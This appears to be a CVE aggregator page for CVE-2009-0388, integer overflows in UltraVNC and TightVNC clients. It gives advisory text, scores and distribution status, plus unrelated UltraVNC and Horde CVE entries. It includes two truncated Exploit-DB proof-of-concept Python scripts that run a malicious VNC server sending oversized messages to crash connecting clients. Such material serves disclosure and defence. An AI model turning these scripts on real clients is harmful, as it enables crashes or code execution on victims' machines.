CVE-2009-0388
published 2009-02-04CVE-2009-0388: Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) TightVnc 1.3.9 allow remote VNC servers to cause a denial of service (heap…
PriorityP351critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
13.33%
95.9th percentile
Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) TightVnc 1.3.9 allow remote VNC servers to cause a denial of service (heap corruption and application crash) or possibly execute arbitrary code via a large length value in a message, related to the (a) ClientConnection::CheckBufferSize and (b) ClientConnection::CheckFileZipBufferSize functions in ClientConnection.cpp.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tightvnc | — | — |
| tightvnc | tightvnc | — | — |
| ultravnc | ultravnc | — | — |
| ultravnc | ultravnc | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_debian10.0LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j23w-r722-rm78: Multiple integer signedness errors in (1) UltraVNC 1
ghsa_unreviewed·2022-05-02
CVE-2009-0388 [HIGH] GHSA-j23w-r722-rm78: Multiple integer signedness errors in (1) UltraVNC 1
Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) TightVnc 1.3.9 allow remote VNC servers to cause a denial of service (heap corruption and application crash) or possibly execute arbitrary code via a large length value in a message, related to the (a) ClientConnection::CheckBufferSize and (b) ClientConnection::CheckFileZipBufferSize functions in ClientConnection.cpp.
Debian
CVE-2009-0388: tightvnc - Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) Tight...
vendor_debian·2009·CVSS 10.0
CVE-2009-0388 [CRITICAL] CVE-2009-0388: tightvnc - Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) Tight...
Multiple integer signedness errors in (1) UltraVNC 1.0.2 and 1.0.5 and (2) TightVnc 1.3.9 allow remote VNC servers to cause a denial of service (heap corruption and application crash) or possibly execute arbitrary code via a large length value in a message, related to the (a) ClientConnection::CheckBufferSize and (b) ClientConnection::CheckFileZipBufferSize functions in ClientConnection.cpp.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
TightVNC - Authentication Failure Integer Overflow (PoC)
exploitdb·2009-02-09·CVSS 10.0
CVE-2009-0388 [CRITICAL] TightVNC - Authentication Failure Integer Overflow (PoC)
TightVNC - Authentication Failure Integer Overflow (PoC)
---
#!/usr/bin/env python
#[email protected]
# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x02\x02\x10'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00'*4
clientsocket.sendall(data)
data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)
data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)
data_cli = clientsocket.r
Exploit-DB
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
exploitdb·2009-02-04
CVE-2009-0388 UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
---
#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
print "Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)"
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.003\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x00'
clientsocket.sendall(data)
data = '\x00\x00\x00\x75'
clientsocket.sendall(data)
data = '\x00' * int(0xffffff)
clientsocket
Wiz
CVE-2026-3787 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-3787 [CRITICAL] CVE-2026-3787 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3787 :
UltraVNC vulnerability analysis and mitigation
A weakness has been identified in UltraVNC 1.6.4.0 on Windows. This affects an unknown function in the library cryptbase.dll of the component Windows Service. This manipulation causes uncontrolled search path. The attack requires local access. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 7.3
Score
Published March 8, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
UltraVNC
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
A
Wiz
CVE-2026-4962 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-4962 [CRITICAL] CVE-2026-4962 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4962 :
UltraVNC vulnerability analysis and mitigation
A security flaw has been discovered in UltraVNC up to 1.6.4.0. Affected by this issue is some unknown functionality in the library version.dll of the component Service. The manipulation results in uncontrolled search path. The attack needs to be approached locally. This attack is characterized by high complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 7.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
UltraVNC
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N
Bugzilla
CVE-2009-3701 horde: PHP_SELF XSS vulnerabilities
bugzilla·2009-12-21·CVSS 4.3
CVE-2009-3701 [MEDIUM] CVE-2009-3701 horde: PHP_SELF XSS vulnerabilities
CVE-2009-3701 horde: PHP_SELF XSS vulnerabilities
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-3701 to
the following vulnerability:
Name: CVE-2009-3701
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3701
Assigned: 20091015
Reference: BUGTRAQ:20091217 [ISecAuditors Security Advisories] Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability
Reference: URL: http://www.securityfocus.com/archive/1/archive/1/508531/100/0/threaded
Reference: FULLDISC:20091217 [ISecAuditors Security Advisories] Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability
Reference: URL: http://archives.neohapsis.com/archives/fulldisclosure/2009-12/0388.html
Reference: MLIST:[announce] 20091215 Horde 3.3.6 (final)
Reference: URL: http://lists.horde.org/archives/announce/2009/0
http://forum.ultravnc.info/viewtopic.php?t=14654http://secunia.com/advisories/33807http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564http://www.coresecurity.com/content/vnc-integer-overflowshttp://www.securityfocus.com/archive/1/500632/100/0/threadedhttp://www.securityfocus.com/bid/33568http://www.vupen.com/english/advisories/2009/0321http://www.vupen.com/english/advisories/2009/0322https://www.exploit-db.com/exploits/7990https://www.exploit-db.com/exploits/8024http://forum.ultravnc.info/viewtopic.php?t=14654http://secunia.com/advisories/33807http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564http://www.coresecurity.com/content/vnc-integer-overflowshttp://www.securityfocus.com/archive/1/500632/100/0/threadedhttp://www.securityfocus.com/bid/33568http://www.vupen.com/english/advisories/2009/0321http://www.vupen.com/english/advisories/2009/0322https://www.exploit-db.com/exploits/7990https://www.exploit-db.com/exploits/8024
2009-02-04
Published